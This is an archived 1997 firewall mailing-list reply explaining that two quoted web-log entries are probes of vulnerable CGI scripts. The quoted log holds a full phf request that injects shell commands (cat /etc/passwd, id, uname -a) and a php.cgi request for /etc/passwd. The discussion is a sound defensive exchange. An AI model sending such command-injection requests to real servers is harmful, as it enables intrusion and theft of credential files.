Great Circle Associates Firewalls
(June 1997) 		 
Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]
Subject: Re: getting passwd file via WWW
From: girsch @ marben . com (Arnaud Girsch)
Date: Wed, 4 Jun 1997 14:08:14 -0700 (PDT)
To: swnuck @ unixpros . com (Stan Wnuck)
Cc: Firewalls @ GreatCircle . COM
In-reply-to: <199706041601 . JAA03033 @ honor . greatcircle . com> from "Stan Wnuck" at Jun 4, 97 12:04:34 pm 
> I have noticed on my WWW log files the following 2 entries.
>  
> some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
> some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
> 
> 
> Does anyone know anything about these cgi scripts or programs?
> Or how dangerous this is?

These are well known cgi scripts containing security holes.
The phf script coming with the default NCSA server is buggy, and should be
disabled. (it allowas execution of shell programs)

Arnaud.

-- 
Arnaud Girsch      -+- Marben Products, Inc. / DSET Corporation - San Jose, CA
agirsch @
 marben .
 com -+-    http://www.marben.com/   -+-    http://www.dset.com/
Follow-Ups:
References:
Indexed By Date Previous: Fortezza's Fate??
From: Vin McLellan <vin @ shore . net>
Next: RE: PIX and Firewall-1
From: Bill Stout <stoutb @ pios . com>
Indexed By Thread Previous: Re: getting passwd file via WWW
From: "Gary G. Hull" <ggh14854 @ glaxowellcome . com>
Next: Re: getting passwd file via WWW
From: Root Admin-KSoft <root @ sibernet . com . tr>
Google
 
Search Internet Search www.greatcircle.com